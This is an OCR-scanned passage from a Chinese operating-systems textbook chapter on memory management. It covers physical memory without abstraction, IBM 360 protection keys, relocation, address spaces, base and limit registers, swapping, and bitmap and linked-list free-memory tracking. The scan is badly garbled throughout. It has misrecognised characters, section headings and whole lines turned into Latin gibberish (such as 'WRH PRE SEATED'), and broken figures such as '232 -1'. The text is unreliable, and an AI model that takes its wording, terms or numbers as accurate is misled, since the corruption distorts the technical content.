的 ， 哪 些 内 存 是 空闲 的 ;在 进程 需要 时 为 其 分 配 内 存 ， 在 进程 使 用 完 
后 释放 内 存 。 


本 章 我 们 会 研究 几 个 不 同 的 存储 管理 方案 ， 涵 次 非常 简单 的 方案 
到 高 度 复杂 的 方案 。 由 于 最 底层 的 高 速 缓存 的 管理 由 硬件 来 完成 ， 本 
章 将 集中 介绍 针对 编程 人 员 的 内 存 模 型 ， 以 及 怎样 优化 管理 内 存 。 至 
于 永久 性 存储 器 一 一 们 c 副 一 一 的 抽象 和 管理 ， 则 是 下 一 革 的 主题 。 我 
们 会 从 最 简单 的 管理 方案 开始 讨论 ， 并 逐步 深入 到 更 为 续 密 的 方案 。 


3.1 Wm aH 


最 简单 的 存储 器 抽象 就 是 根本 没有 抽象 。 早 期 大 型 计算 机 (20TH 
纪 60 年 代 之 前 ) 、 小 型 计算 机 (20 世 纪 70 年 代 之 前 ) 和 个 人 计算 机 
(20 世 纪 80 年 代 之 前 ) 都 没有 存储 器 抽象 。 每 一 个 程序 都 直接 访问 物 
理 内 存 。 当 一 个 程序 执行 如 下 指令 : 


MOV REGISTER1, 1000 


计算 机 会 将 位 置 为 1000 的 物理 内 存 中 的 内 容 移 到 REGISTER1 中 。 
因此 ， 那 时 呈现 给 编程 人 员 的 存储 器 模型 就 是 简单 的 物理 内 存 : 从 0 到 


某 个 上 限 的 地 址 集合 ， 每 一 个 地 址 对 应 一 个 可 容纳 一 定数 目 二 进 制 位 
的 存储 单元 ， 通 第 是 8 个 。 


在 这 种 情况 下 ， 要 想 在 内 存 中 同时 运行 两 个 程序 是 不 可 能 的 。 如 
果 第 一 个 程序 在 2000 的 位 置 写 入 一 个 新 的 值 ， 将 会 擦 掉 第 二 个 程序 存 
放 在 相同 位 置 上 的 所 有 内 容 ， 所 以 同时 运行 两 个 程序 是 根本 行 不 通 
的 ， 这 两 个 程序 会 立刻 裔 省。 


不 过 即使 存储 器 模型 就 是 物理 内 存 ， 还 是 存在 一 些 可 行 选项 的 。 
图 3-1 展 示 了 三 种 变 体 。 在 图 3-1a 中 ， 操 作 系 统 位 于 RAM (随机 访问 存 
储 器 ) 的 底部 ， 在 图 3-1b 中 ， 操 作 系 统 位 于 内 存 顶 端的 ROM (只 读 存 
储 器 ) 中 ;， 而 在 图 3-1c 中 ， 设 备 驱 动 程序 位 于 内 存 顶 端的 ROM 中 ， 而 
操作 系统 的 其 他 部 分 则 位 于 下 面 的 RAM 的 底部 。 第 一 种 方案 以 前 被 用 
在 大 型 机 和 小 型 计算 机 上 ， 现 在 很 少 使 用 了 。 第 二 种 方案 被 用 在 一 些 
掌上 电脑 和 散 入 式 系统 中 。 第 三 种 方案 用 于 早期 的 个 人 计算 机 中 ( 例 
如 运行 MS-DOS 的 计算 机 ) ， 在 ROM 中 的 系统 部 分 称 为 BIOS (Basic 
Input Output System， 基 本 输入 输出 系统 ) 。 第 一 种 方案 和 第 三 种 方案 
的 缺点 是 用 户 程序 出 现 的 错误 可 能 摊 毁 操作 系统 ， 引 发 灾难 性 后 果 
(EERO HEE) 。 


OXFEF a; 位 于 ROM 中 的 
设备 驱动 程序 


位 于 ROM 中 
的 操作 系统 


用 户 程序 


用 户 程序 


位 于 RAM 中 


位 于 RAM 中 
的 操作 系统 的 操作 系统 
0 0 
a) b) c) 


图 3-1 在 只 有 操作 系统 和 一 个 用 户 进 程 的 情形 下 ， 组 织 内 存 的 三 种 
简单 方法 (当然 也 存在 其 他 方案 ) 


当 按 这 种 方式 组 织 系统 时 ， 通 第 同一 个 时 刻 只 能 有 一 个 进程 在 运 
行 。 一 旦 用 户 键入 了 一 个 命令 ,操作 系统 束 把 需要 的 程序 从 磁盘 复制 
到 内 存 中 并 执行 ， 当 进程 运行 结束 后 ， 操 作 系统 在 用 户 终端 显示 提示 
符 并 等 待 新 的 命令 。 收 到 新 的 命令 后 ， 它 把 新 的 程序 装 入 内 存 ， 履 盖 
前 一 个 程序 。 


在 没有 内 存 抽象 的 系统 中 实现 并 行 的 一 种 方法 是 使 用 多 线程 来 编 
程 。 由 于 在 引入 线程 时 就 假设 一 个 进程 中 的 所 有 线程 对 同一 内 存 映像 
都 可 见 ， 那 么 实现 并 行 也 整 不 古 问 题 了 。 虽 然 这 个 想法 行 得 通 ， 但 却 
没有 被 广泛 使 用 ， 因 为 人 们 通 和 希望 能 够 在 同一 时 间 运 行 没有 关联 的 
程序 ， 而 这 正 古 线程 抽象 所 不 能 提供 的 。 更 进一步 地 ， 一 个 没有 内 存 
抽象 的 系统 也 不 大 可 能 具有 线程 抽象 的 功能 。 


在 不 使 用 内 存 抽象 的 情况 下 运行 多 道 程序 


但 是 ， 即 使 没有 内 存 抽象 ， 同 时 运行 多 个 程序 也 是 可 能 的 。 操 作 
系统 只 需要 把 当前 内 存 中 所 有 内 容 保 存 到 磁盘 文件 中 ， 然 后 把 下 一 个 
程序 读 入 到 内 存 中 再 运行 即 可 。 只 要 在 某 一 个 时 间 内 存 中 只 有 一 个 程 
序 ， 那 么 就 不 会 发 生 冲 突 。 这 样 的 交换 概念 会 在 下 面 讨 论 。 


在 特殊 硬件 的 帮助 下 ， 即 使 没有 交换 功能 ， 并 发 地 运行 多 个 程序 
也 是 可 能 的 。IBM 360 的 早期 模型 是 这 样 解决 的 ， 内 存 被 划分 为 2KB 的 
块 ， 每 个 块 被 分 配 一 个 4 位 的 保护 键 ， 保 护 键 存储 在 CPU 的 特殊 寄存 器 
中 。 一 个 内 存 为 1MB 的 机 器 只 需要 512 个 这 样 的 4 位 寄存 器 ， 容 量 总 共 
为 256 字 节 。PSW (Program Status Word， 程 序 状态 字 ) 中 存 有 一 个 4 位 
码 。 一 个 运行 中 的 进程 如 果 访 问 保 护 键 与 其 PSW 码 不 同 的 内 存 ，360 的 
人 硬件 会 捕获 到 这 一 事件 。 因 为 只 有 操作 系统 可 以 修改 保护 键 ， 这 样 就 
可 以 防止 用 户 进程 之 间 、 用 户 进程 和 操作 系统 之 间 的 互相 干扰 。 


然而 ， 这 种 解决 方法 有 一 个 重要 的 缺陷。 如 图 3-2 所 示 ， 假 设 我 们 
有 两 个 程序 ， 每 个 大 小 各 为 16KB， 如 图 3-2a 和 图 3-2b 所 示 。 前 者 加 了 
阴影 表示 它 和 后 者 使 用 不 同 的 内 存 键 。 第 一 个 程序 一 开始 就 跳 转 到 地 
址 24， 那 里 是 一 条 MOV 指 令 。 第 二 个 程序 一 开始 跳 转 到 地 址 28， 那 里 
是 一 条 CMP 指 令 。 与 讨论 无 关 的 指令 没有 画 出 来 。 当 两 个 程序 被 连续 
地 装载 到 内 存 中 从 0 开始 的 地 址 时 ， 内 存 中 的 状态 就 如 同 图 3-2c 所 示 。 
在 这 个 例子 里 ， 我 们 假设 操作 系统 是 在 高 地 址 处 ， 图 中 没有 画 出 来 。 


0 32764 


图 3-2 重 定 位 问题 的 说 明 : g 一 个 16KB 程 序 ，b) 另 一 个 16KB 程 序 ; 
c) 两 个 程序 连续 地 装载 到 内 存 中 


程序 装载 完毕 之 后 就 可 以 运行 了 。 由 于 它们 的 内 存 键 不同 ， 它 们 
不 会 破坏 对 方 的 内 存 。 但 在 另 一 方面 会 发 生 问题 。 当 第 一 个 程序 开始 
运行 时 ， 它 执行 了 JMP 24 指 令 ， 然 后 不 出 预料 地 跳 转 到 了 相应 的 指 
令 


这 个 程序 会 正常 运行 。 


但 是 ， 当 第 一 个 程序 已 经 运行 了 一 段 时 间 后 ， 操 作 系统 可 能 会 决 
定 开 始 运行 第 二 个 程序 ， 即 装载 在 第 一 个 程序 之 上 的 地 址 16 384 处 的 程 
序 。 这 个 程序 的 第 一 条 指令 是 JMP 28， 这 条 指令 会 使 程序 跳 转 到 第 一 
个 程序 的 ADD 指 令 ， 而 不 是 事先 设 定 的 跳 转 到 CMP 指 令 。 由 于 对 内 存 
地 址 的 不 正确 访问 ， 这 个 程序 很 可 能 在 1 秒 之 内 惑 须 涡 了 。 


这 里 关键 的 问题 是 这 两 个 程序 都 引用 了 绝对 物理 地 址 ， 而 这 正 是 
我 们 最 需要 避免 的 。 我 们 希望 每 个 程序 都 使 用 一 套 私 有 的 本 地 地 址 来 
进行 内 存 寻 址 。 下面 我 们 会 展示 这 种 技术 是 如 何 实现 的 。IBM 360 对 上 
述 问 题 的 补救 方案 就 是 在 第 二 个 程序 装载 到 内 存 的 时 候 ， 使 用 静态 重 
定位 的 技术 修改 它 。 它 的 工作 方式 如 下 : 当 一 个 程序 被 装载 到 地 址 16 
384 时 ， 和 常数 16 384 被 加 到 每 一 个 程序 地 址 上。 里 然 这 个 机 制 在 不 出 错 
误 的 情况 下 是 可 行 的 ， 但 这 不 十 一 种 通用 的 解决 办 法 ， 同 时 会 减 慢 小 
载 速 度 。 而 且 ， 它 要 求 给 所 有 的 可 执行 程序 提供 额外 的 信息 来 区 分 哪 
些 内 存 字 中 存 有 (可 重 定位 的 ) 地 址 ， 哪 些 没有 。 毕 竟 ， 图 3-2b 中 
的 “28” 需 要 被 重 定 位 ， 但 是 像 


MOV REGISTER1, 28 


这 样 把 数 28 送 到 REGISTER1 的 指令 不 可 以 被 重 定位 。 装 载 右 需要 
一 定 的 方法 来 辨别 地 址 和 常数 。 


最 后 ， 正 如 我 们 在 第 1 章 中 指出 的 ， 计 算 机 世界 的 发 展 总 是 倾向 于 
重复 历史 。 虽 然 直 接 引用 物理 地 址 对 于 大 型 计算 机 、 小 型 计算 机 、 台 
式 计 算 机 和 笔记 本 电脑 来 说 已 经 成 为 很 久远 的 记忆 了 (对 此 我 们 深 表 
遗憾 ) ， 但 是 缺少 内 存 抽象 的 情况 在 嵌入 式 系统 和 智能 卡 系统 中 还 是 
RE ILAS o ME, RAEN ` 洗衣 机 和 微波 炉 这 样 的 设备 都 已 经 完全 
被 (ROM 形式 的 ) 软件 控制 ， 在 这 些 情 况 下 ， 软 件 都 采用 访问 绝对 内 
存 地 址 的 村 址 方式 。 在 这 些 设备 中 这 样 能 够 正音 工作 是 因为 ， 所 有 运 
行 的 程序 都 是 可 以 事先 确定 的 ， 用 户 不 可 能 在 烤 面 包机 上 自由 地 运行 
他 们 自己 的 软件 。 


虽然 高 端的 借入 式 系统 (比如 手机 ) 有 复杂 的 操作 系统 ， 但 是 一 
般 的 简单 个 入 式 系统 并 非 如 此 。 在 茶 些 情况 下 可 以 用 一 种 简单 的 操作 
系统 ， 它 只 是 一 个 被 链接 到 应 用 程序 的 库 ， 该 库 为 程序 提供 MO 和 其 他 
任务 所 需要 的 系统 调用 。 操 作 系 统 作 为 库 实现 的 常见 例子 如 流行 的 e- 
cos 操 作 系统 。 


3.2 PHa: HODES H] 


JAZ, FERED EE ATE KR RELL NY lala ° SB, 
WRH PRE SEATED, ECA DH (故意 
地 或 偶然 地 ) 破坏 操作 系统 ， 从 而 使 系统 慢 慢 地 停止 运行 (除非 有 特 
殊 的 硬件 进行 保护 ， 如 IBM 360 的 锁 键 模式 ) 。 即 使 在 只 有 一 个 用 户 
进程 运行 的 情况 下 ， 这 个 问题 也 是 存在 的 。 第 二 ， 使 用 这 种 模型 ， 想 
要 同时 〈 如 果 只 有 一 个 CPU 惑 轮 流 执行 ) 运行 多 个 程序 是 很 困难 的 。 
在 个 人 计算 机 上 ， 同 时 打开 几 个 程序 是 很 常见 的 〈 一 个 文字 处 理 器 ， 
一 个 邮件 程序 ， 一 个 网 络 浏 蜗 郁 ， 其 中 一 个 当前 正在 工作 ， 其 余 的 在 
按 下 鼠标 的 时 候 才 会 被 激活 ) 。 在 系统 中 没有 对 物理 内 存 的 抽象 的 情 
况 下 ， 很 难 做 到 上 述 情景 ， 因 此 ， 我 们 需要 其 他 办 法 。 


3.2.1 ”地址 空间 的 概念 


要 保证 多 个 应 用 程序 同时 处 于 内 存 中 并 且 不 互相 影响 ， 则 需要 解 
决 两 个 问题 : 保护 和 重 定位 。 我 们 来 看 一 个 原始 的 对 前 者 的 解决 办 
法 ， 它 曾 被 用 在 IBM 360 上 : 给 内 存 块 标记 上 一 个 保护 键 ， 并 且 比 较 
执行 进程 的 键 和 其 访问 的 每 个 内 存 字 的 保护 键 。 然 而 ， 这 种 方法 本 刁 
并 没有 解决 后 一 个 问题 ， 虽 然 这 个 问题 可 以 通过 在 程序 被 猜 载 时 重 定 
位 程序 来 解决 ， 但 这 是 一 个 缓慢 且 复 杂 的 解决 方法 。 


一 个 更 好 的 办 法 是 创造 一 个 新 的 内 存 抽象 ， 地 址 空间 。 整 像 进 程 
的 概念 创造 了 一 类 抽象 的 CPU 以 运行 程序 一 样 ， 地 址 空间 为 程序 创造 
了 一 种 抽象 的 内 存 。 地 址 空间 是 一 个 进程 可 用 于 村 址 内 存 的 一 套 地 址 
集合 。 每 个 进程 都 有 一 个 自己 的 地 址 空间 ， 并 且 这 个 地 址 空间 独立 于 
其 他 进程 的 地 址 空间 (除了 在 一 些 特殊 情况 下 进程 需要 共享 它们 的 地 
址 空间 外 ) 。 


地 址 空间 的 概念 非常 通用 ， 并 且 在 很 多 场合 中 出 现 。 比 如 电话 号 
码 ， 在 美国 和 很 多 其 他 国家 ， 一 个 本 地 电话 号 码 通 常 是 一 个 7 位 的 数 
字 。 因 此 ， 电 话 号 码 的 地 址 空间 是 从 0 000 000 到 9 999 999， 虽 然 一 些 
号 码 并 没有 被 使 用 ， 比 如 以 000 开 头 的 号 码 。 随 着 手机 、 调 制 解 调 器 和 
传真 机 数量 的 增长 ， 这 个 空间 变 得 越 来 越 不 够 用 了 ， 从 而 导致 需要 使 
用 更 多 位 数 的 号 码 。Pentium 的 WO 端口 的 地 址 空间 从 0 到 16 383 ° IPv4 
的 地 址 是 32 位 的 数字 ， 因 此 它们 的 地 址 空间 从 0 到 232 -1 (也 有 一 些 保 


BAF) ° 


地 址 空间 可 以 不 是 数字 的 。 一 套 “.com” 的 互联 网 域名 也 是 地 址 空 
间 。 这 个 地 址 空间 是 由 所 有 包含 2~63 个 字符 并 且 后 面 跟 着 “.com” 的 字 
符 香 组 成 的 ， 组 成 这 些 字符 串 的 字符 可 以 是 字母 、 数 字 和 连 字 符 。 到 
现在 你 应 该 已 经 明白 地 址 至 间 的 概念 了 。 它 是 很 简单 的 。 


比较 难 的 是 给 每 个 程序 一 个 目 己 的 地 址 空间 ， 使 得 一 个 程序 中 的 
地 址 28 所 对 应 的 物理 地 址 与 男 一 个 程序 中 的 地 址 28 所 对 应 的 物理 地 址 


不 同 。 下 面 我 们 将 讨论 一 个 简单 的 方法 ， 这 个 方法 曾经 很 常见 ， 但 是 
在 有 能 力 把 更 复杂 (MHE) 的 机 制 运用 在 现代 CPU 心 乒 上 之 后 ， 
这 个 方法 就 不 再 使 用 了 。 


基 址 寄存 絮 与 界限 寄存 器 


这 个 简单 的 解决 办 法 使 用 一 种 简单 的 动态 重 定 位 。 它 所 做 的 是 简 

单 地 把 每 个 进程 的 地 址 空间 映射 到 物理 内 存 的 不 同 部 分 。 从 CDC 6600 

(世界 上 最 早 的 超级 计算 机 ) 到 Intel 8088 (原始 IBM PC 的 心脏 ) ， 所 
使 用 的 经 典 办 法 是 给 每 个 CPU 配置 两 个 特殊 硬件 寄存 器 ， 通 常 叫做 基 
址 寄存 器 和 界限 寄存 器 。 当 使 用 基 址 寄存 器 和 界限 寄存 器 时 ， 程 序 装 
载 到 内 存 中 连续 的 空间 位 置 且 装载 期 间 无 须 重 定 位 ， 如 图 3-2c 所 示 。 
当 一 个 进程 运行 时 ， 程 序 的 起 始 物理 地 址 装载 到 基 址 寄存 器 中 ， 程 序 
的 长 度 装载 到 界限 寄存 器 中 。 在 图 3-2c 中 ， 当 第 一 个 程序 运行 时 ， 装 
载 到 这 些 硬件 寄存 器 中 的 基 址 和 界限 值 分 别 是 0 和 16 384。 当 第 二 个 程 
序 运 行 时 ， 这 些 值 分 别 是 16 384 和 32 768。 如 果 第 三 个 16KB 的 程序 被 
直接 装载 在 第 二 个 程序 的 地 址 之 上 并 且 运 行 ， 这 时 基 址 寄存 器 和 界限 
寄存 器 里 的 值 会 是 32 768 和 16 384 ° 


每 次 一 个 进程 访问 内 存 ， 取 一 条 指令 ， 读 或 写 一 个 数据 字 ，CPU 
硬件 会 在 把 地 址 发 送 到 内 存 总 线 前 ， 目 动 把 基 址 值 加 到 进程 发 出 的 地 
址 值 上 。 同 时 ， 它 检查 程序 提供 的 地 址 是 否 等 于 或 大 于 界限 寄存 器 里 


的 值 。 如 果 访问 的 地 址 超过 了 界限 ， 会 产生 错误 并 中 止 访 问 。 这 样 
对 图 3-2c 中 第 二 个 程序 的 第 一 条 指令 ， 程 序 执行 


JMP 28 


和 令 ， 但 古人 硬件 把 这 条 指令 解释 成 为 


JMP 16412 


所 以 程序 如 我 们 所 愿 地 跳 转 到 了 了 CMP 指令 。 在 图 3-2c 中 第 二 个 程 
序 的 执行 过 程 中 ， 基 址 寄存 右 和 界限 寄存 右 的 设置 如 图 3-3 所 示 。 


16384 


| 0 3276 


界限 寄存 器 


基 址 寄存 器 


Al 3-3 基 址 寄存 器 和 界限 寄存 器 可 用 于 为 每 个 进程 提供 一 个 独立 的 
地 址 空间 


使 用 基 址 寄存 器 和 界限 寄存 器 是 给 每 个 进程 提供 私有 地 址 空间 的 
非常 容易 的 方法 ， 因 为 每 个 内 存 地 址 在 送 到 内 存 之 前 ， 都 会 自动 先 加 


上 基 址 寄存 器 的 内 容 。 在 很 多 实际 系统 中 ， 对 基 址 寄存 器 和 界限 寄存 
器 会 以 一 定 的 方式 加 以 保护 ， 使 得 只 有 操作 系统 可 以 修改 它们 。 在 

CDC 6600 中 就 提供 了 对 这 些 寄存 器 的 保护 ， 但 在 Intel 8088 中 则 没有 ， 
甚至 没有 界限 寄存 器 。 但 是 ，Intel 8088 提 供 了 多 个 基 址 寄存 器 ， 使 程 
序 的 代码 和 数据 可 以 被 独立 地 重 定位 ， 但 是 没有 提供 引用 地 址 越界 的 
预防 机 制 。 


使 用 基 址 寄存 右 和 界限 寄存 右 重 定位 的 缺点 是 ， 每 次 访问 内 存 都 
需要 进行 加 法 和 比较 运算 。 比 较 可 以 做 得 很 快 ， 但 是 加 法 由 于 进位 传 
递 时 间 的 问题 ， 在 没有 使 用 特殊 电路 的 情况 下 会 显得 很 慢 。 


3.2.2 ”交换 技术 


如 有 条 计 算 机 物理 内 存 足够 大 ， 可 以 保存 所 有 进程 ， 那 么 之 前 提 及 
的 所 有 方案 都 或 多 或 少 是 可 行 的 。 但 实际 上 ， 所 有 进程 所 需 的 RAM 数 
量 总 和 通 间 要 远 远 超出 存储 各 能 够 文 持 的 范围 。 在 一 个 典型 的 Windows 
或 Linux 系 统 中 ， 在 计算 机 完成 引导 后 ， 会 司 动 40 一 60 个 ， 甚 至 更 多 的 
进程 。 例 如 ， 当 一 个 Windows 应 用 程序 安装 后 ， 通 常会 发 出 一 系列 命 
令 ， 使 得 在 此 后 的 系统 引导 中 会 局 动 一 个 仅仅 用 于 查看 该 应 用 程序 更 
新 的 进程 。 这 样 一 个 进程 会 轻易 地 占据 5~10MB 的 内 存 。 其 他 后 台 进 
程 还 会 但 看 所 收 到 的 邮件 和 进来 的 网 络 连 授 ， 以 及 其 他 很 多 诸如 此 类 
的 任务 。 并 且 ， 这 一 切 都 发 生 在 第 一 个 用 户 程序 启动 之 前 。 当 前 重要 
的 应 用 程序 能 轻易 地 占据 50~ 200MB 甚 至 更 多 的 空间 。 因 此 ， 把 所 有 


进程 一 直 保 存在 内 存 中 需要 巨大 的 内 存 ， 如 果 内 存 不 够 ， 就 做 不 到 这 
一 点 6 


有 两 种 处 理 内 存 超载 的 通用 方法 。 最 简单 的 策略 是 交换 
(swapping) 技术 ， 即 把 一 个 进程 完整 调 入 内 存 ， 使 该 进程 运行 一 段 时 
间 ， 然 后 把 它 存 回 磁盘 。 空 闲 进程 主要 存储 在 磁盘 上 ， 所 以 当 它 们 不 
运行 时 就 不 会 占用 内 存 (尽管 它们 的 一 些 进程 会 周期 性 地 被 唤醒 以 完 
成 相关 工作 ， 然 后 就 又 进入 睡眠 状态 ) 。 男 一 种 策略 是 虚拟 内 存 


(virtual memory) ， 该 策略 甚至 能 使 程序 在 只 有 一 部 分 被 调 入 内 存 的 
情况 下 运行 。 下 面 我 们 先 讨 论 交 换 技 术 ，3.3 太 我 们 将 考察 虚拟 内 存 。 


交换 系统 的 操作 如 图 3-4 所 示 。 开 始 时 内 存 中 只 有 进程 A。 之 后 创 
建 进程 B 和 C 或 者 从 磁 副 将 它们 换 入 内 存 。 图 3-4d 显 示 A 被 交换 到 磁 
。 然 后 D 被 调 入 ，B 被 调 出 ， 最 后 A 再 次 被 调 入 。 由 于 A 的 位 置 发 生变 
化 ， 所 以 在 它 换 入 的 时 候 通 过 软件 或 者 在 程序 运行 期 间 (多 数 是 这 种 
情况 ) 通过 硬件 对 其 地 址 进行 重 定 位 。 例 如 ， 在 这 里 可 以 很 好 地 使 用 
基 址 寄存 器 和 界限 寄存 器 。 
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图 3-4 ”内存 分 配 情况 随 着 进程 进出 而 变化 ， 阴 影 区域 表 示 未 使 用 的 
内 存 


交换 在 内 存 中 产生 了 多 个 空间 区 (hole， 也 称 为 空洞 ; ， 通 过 把 所 
有 的 进程 尽 可 能 网 下 移动 ， 有 可 能 将 这 些小 的 空闲 区 合成 一 大 块 。 该 


技术 称 为 内 存 基 缩 (memory compaction) 。 这 个 操作 通常 不 进行 ， 因 
为 它 要 耗费 大 量 的 CPU 时 间 。 例 如 ， 一 台 有 1GB 内 存 的 计算 机 可 以 每 
20ns 复 制 4 个 字 节 ， 它 紧缩 全 部 内 存 大 约 要 花费 5s。 


有 一 个 问题 值得 注意 ， 即 当 进 程 被 创建 或 换 入 时 应 该 为 它 分 配 多 
大 的 内 存 。 辱 进程 创建 时 其 大 小 是 固定 的 并 且 不 再 改变 ， 则 分 配 很 简 
单 ， 操 作 系 统 准 确 地 按 其 需要 的 大 小 进行 分 配 ， 不 多 也 不 少 。 


但 是 如 果 进 程 的 数据 段 可 以 增长 ， 例 如 ， 很 多 程序 设计 语言 都 允 
许 从 扒 中 动态 地 分 配 内 存 ， 那 么 当 进 程 空 间 试图 增长 时 ， 束 会 出 现 问 
题 。 寿 该 进程 与 一 个 空 采 区 相 邻 ， 那 么 可 把 该 空闲 区 分 配给 该 进程 让 
它 在 这 个 空间 区 增 大 。 故 一 方面 ， 奋 进程 相 邻 的 是 男 一 个 进程 ， 那 么 
要 么 把 需要 增长 的 进程 移 到 内 存 中 一 个 足够 大 的 区 域 中 去 ， 要 么 把 一 
个 或 多 个 进程 交换 出 去 ， 以 便 生成 一 个 足够 大 的 空间 区 。 夯 一 个 进程 
在 内 存 中 不 能 增长 ， 而 且 磁 副 上 的 交换 区 也 已 满 了 ， 那 么 这 个 进程 只 
有 挂 起 直到 一 些 空间 空闲 (或 者 可 以 结束 该 进程 ，。 


如 采 大 部 分 进程 在 运行 时 都 要 增长 ， 为 了 减少 因 内 存 区 域 不 够 而 
引起 的 进程 交换 和 移动 所 产生 的 开销 ， 一 种 可 用 的 方法 是 ， 当 换 入 或 
移动 进程 时 为 它 分 配 一 些 额 外 的 内 存 。 然 而 ， 当 进程 伞 换 出 到 磁盘 上 
时 ， 应 该 只 交换 进程 实际 上 使 用 的 内 存 中 的 内 容 ， 将 额外 的 内 存 交 换 
出 去 十 一 种 浪费 。 在 图 3-5a 中 读者 可 以 看 到 一 种 已 为 两 个 进程 分 配 了 增 
长 空间 的 内 存 配置 。 
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操作 系统 操作 系统 


a) b) 


图 3-5 a) 为 可 能 增长 的 数据 段 预 留 空间 ; b) 为 可 能 增长 的 数据 段 和 
堆栈 段 预 留 空间 


如 采 进 程 有 两 个 可 增长 的 段 ， 例 如 ， 供 变量 动态 分 配 和 释放 的 作 
为 堆 使 用 的 一 个 数据 段 ， 以 及 存放 普通 局 部 变量 与 返回 地 址 的 一 个 堆 
栈 段 ， 则 可 使 用 另 一 种 安排 ， 如 图 3-5b 所 示 。 在 图 中 可 以 看 到 所 示 进 程 
的 堆栈 段 在 进程 所 占 内 存 的 顶端 并 向 下 增长 ， 紧 接 在 程序 段 后 面 的 数 
据 段 辐 上 增长 。 在 这 两 者 之 间 的 内 存 可 以 供 两 个 段 使 用 。 如 采用 完 
了 ， 进 程 或 者 必须 移动 到 足够 大 的 空闲 区 中 ( 它 可 以 被 交换 出 内 存 直 
到 内 存 中 有 足够 的 空间 ) ， 或 者 结束 该 进程 。 


3.23 BinAG ee 


在 动态 分 配 内 存 时 ， 操 作 系统 必须 对 其 进行 管理 。 一 般 而 言 ， 有 
两 种 方式 跟踪 内 存 使 用 情况 : 位 图 和 空 内 链表 。 下 面 我 们 将 介绍 这 两 
种 方式 。 


1. 使 用 位 图 的 存储 管理 


使 用 位 图 方法 时 ， 内 存 可 能 被 划分 成 小 到 几 个 字 或 大 到 几 千 字 市 
的 分 配 单元 。 每 个 分 配音 元 对 应 于 位 图 中 的 一 位 ，0 表 示 空 几 ，1 表 示 
占用 (或 者 相反 ) 。 一 块 内 存 区 和 其 对 应 的 位 图 如 图 3-6 所 示 。 
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图 3-6 a) 一段 有 5 个 进程 和 3 个 空 帮 区 的 内 存 ， 刻 度 表 示 内 存 分 配 的 
单元 ， 阴 有 影 区 域 表示 空间 (在 位 图 中 用 0 表示 ) ; b) 对 应 的 位 图 ; H 
空 内 表 表示 的 同样 的 信息 


分 配 单元 的 大 小 是 一 个 重要 的 设计 因素 。 分 配 单元 越 小 ， 位 图 越 
大 。 然 而 即使 只 有 4 个 字 节 大 小 的 分 配 单元 ，32 位 的 内 存 也 只 需要 位 图 
中 的 1 位 ，32n 位 的 内 存 需要 n 位 的 位 图 ， 所 以 位 图 只 占用 了 1/33 的 内 
存 。 厦 选择 比较 大 的 分 配 单元 ， 则 位 图 更 小 。 但 大 进程 的 大 小 不 是 分 
配 单元 的 整数 倍 ， 那 么 在 最 后 一 个 分 配 持 元 中 束 会 有 一 定数 量 的 内 存 
被 浪费 了 。 


因为 内 存 的 大 小 和 分 配 单元 的 大 小 决定 了 位 图 的 大 小 ， 所 以 它 提 
供 了 一 种 简单 的 利用 一 块 固定 大 小 的 内 存 区 避 ® 能 对 内 存 使 用 情况 进行 
记录 的 方法 。 这 种 方法 的 主要 问题 征 ， 在 决定 把 一 个 占 k 个 分 配 单元 的 
进程 调 入 内 存 时 ， 和 存储 管理 如 必须 搜索 位 图 ， 在 位 图 中 找 出 有 k 个 连续 
0 的 串 。 查 找 位 图 中 指定 长 度 的 连续 0 串 是 耗 时 的 操作 (因为 在 位 图 中 
该 串 可 能 跨越 字 的 边界 ) ， 这 是 位 图 的 缺点 。 


2. 使 用 链表 的 存储 管理 


男 一 种 记 杂 内 存 使 用 情况 的 方法 是 ， 维 护 一 个 记 孙 已 分 配 内 存 段 
和 空 几 内 存 段 的 链表 。 其 中 链表 中 的 一 个 结 点 或 者 包含 一 个 进程 ， 或 
考古 两 个 进程 间 的 一 个 空 的 空 闪 区。 可 用 图 3-6c 所 示 的 段 链表 来 表示 图 
3-6a 所 示 的 内 存 布局 。 链 表 中 的 每 一 个 结 点 都 包含 以 下 域 ， 空 几 区 
(H) 或 进程 (P) 的 指示 标志 、 起 始 地 址 、 长 度 和 指向 下 一 结 点 的 指 
ore 


在 本 例 中 ， 段 链表 十 按照 地 址 排序 的 ， 其 好 处 是 当 进 程 终止 或 被 
换 出 时 链表 的 更 者 非常 直接 。 一 个 要 终止 的 进程 一 般 有 两 个 邻居 ( 除 
非 它 是 在 内 存 的 最 底 端 或 最 顶端 ) ， 它 们 可 能 是 进程 也 可 能 是 空间 
区 ， 这 就 导致 了 图 3-7 所 示 的 四 种 组 合 。 在 图 3-7a 中 更 新 链表 需要 把 P 替 
HKH; 在 图 3-7b 和 图 3-7c 中 两 个 结 点 被 合并 成 为 一 个 ， 链 表 少 了 一 个 
结 氮 ; 在 图 3-7d 中 三 个 络 点 被 合并 为 一 个 ， 从 链表 中 删除 了 两 个 结扎 。 
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图 3-7 结束 进程 X 时 与 相 邻 区 域 的 四 种 组 合 
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因为 进程 表 中 表示 终止 进程 的 结 点 中 通常 含有 指向 对 应 于 其 段 链 
表 结 点 的 指针 ， 因 此 段 链 表 使 用 双 链 表 可 能 要 比 图 3-6c 所 示 的 单 链表 更 
方便 。 这 样 的 结构 更 易于 找到 上 一 个 结 点 ， 并 检查 是 人 否 可 以 合并 。 


当 按 照 地 址 顺序 在 链表 中 存放 进程 和 空 用 区 时 ， 有 几 种 算法 可 以 
用 来 为 创建 的 进程 〈 或 从 磁盘 换 入 的 已 存在 的 进程 ) 分配 内 存 。 这 
里 ， 假 设 存储 管理 大 知 道 要 为 进程 分 配 的 多 大 的 内 存 。 最 稍 单 的 算法 
是 首次 适 配 (first fit) 算法 。 存 储 管理 器 沿 着 段 链 表 进 行 搜 索 ， 直 到 找 


到 一 个 足够 大 的 空间 区 ， 除 非 空 几 区 大 小 和 要 分 配 的 空间 大 小 正好 一 
样 ， 否 则 将 该 空闲 区 分 为 两 部 分 ， 一 部 分 供 进程 使 用 ， 另 一 部 分 形成 
新 的 空 亲 区 。 首 次 适 配 算法 是 一 种 速度 很 快 的 算法 ， 因 为 它 尽 可 能 少 
地 搜索 链表 结 点 。 


对 首次 适 配 算法 进行 很 小 的 修改 就 可 以 得 到 下 次 适 配 (next fit) 算 
法 。 它 的 工作 方式 和 首次 适 配 算法 相同 ， 不 同 点 是 每 次 找到 合适 的 择 
内 区 时 都 记录 当时 的 位 置 。 以 便 在 下 次 寻找 空间 区 时 从 上 次 结束 的 地 
方 开始 搜索 ， 而 不 是 像 目 次 适 配 算法 那样 每 次 都 从 头 开 始 。Bays 
(1977) 的 仿真 程序 证 明 下 次 适 配 算法 的 性 能 略 低 于 首次 适 配 算法 。 


